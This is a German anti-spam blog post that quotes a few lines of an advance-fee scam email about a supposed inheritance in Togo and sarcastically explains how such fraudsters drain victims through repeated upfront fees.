Ich bin sein persönlicher Anwalt und ich brauche Ihre Mitarbeit und Partnerschaft in dieser Angelegenheit.

…eine ideale Grundlage für eine geschäftliche Partnerschaft. 👎

Für weitere Informationen wenden Sie sich bitte an mich.

Leider ist das Mailpapier jetzt leer, und deshalb gibt es keine lustigen Geschichten mehr. 📜

Aber keine Sorge, wenn man auf diese gnadenlos dümmliche Spam antwortet, hat der Onkel Spammer sich wieder neues Mailpapier gekauft und kann auch wieder lustige und spannende Geschichten erzählen. Geschichten von einem Einhorn… ähm… von einer Erbschaft, die einfach im fernen Togo rumliegt und die man mit ein paar gefälschten Dokumenten einfach abholen kann. 🦄

Berge von Geld! Millionen von Dollar! 💰

Und der Spammer will halbe-halbe machen. Sagt er. 🤝

Leider sind vorher „ein paar“ Vorleistungen fällig. Hier ein Notar, da noch die Beglaubigung der Erbschaft, dort ein teurer Stempel, noch eine Erklärung zum Geldwäschegesetz, hier noch eine Gebühr und dort eine weitere Gebühr und auch mal ein paar Hunderter zur Bestechung eines korrupten Beamten. Da kommt richtig Geld zusammen, das einem am Telefon von einer gut eingespielten Bande aus der Tasche gelabert wird, das werden schnell fünfstellige Beträge, wenn die Betrüger so viel aus ihrem Opfer rausleiern können – „Frag doch mal deinen Freund, ob er dir ein paar Hunderter leiht“. Mit dem Geld geht die Bande in den Puff und macht sich eine gute Zeit bei Koks und Nutten. Es ist weg. Es kommt niemals zurück. Der Kontakt „nach Togo“ bricht plötzlich ab. Und die Erbschaft existiert natürlich nicht. Sie war und ist die ganze Zeit nur eine Lüge. 💸

Mit freundlichen Grüßen,
Eric DEKONOR, Esq.

Freundlich wie ein vandalierender Einbrecher
Dein nigerianischer Vorschussbetrüger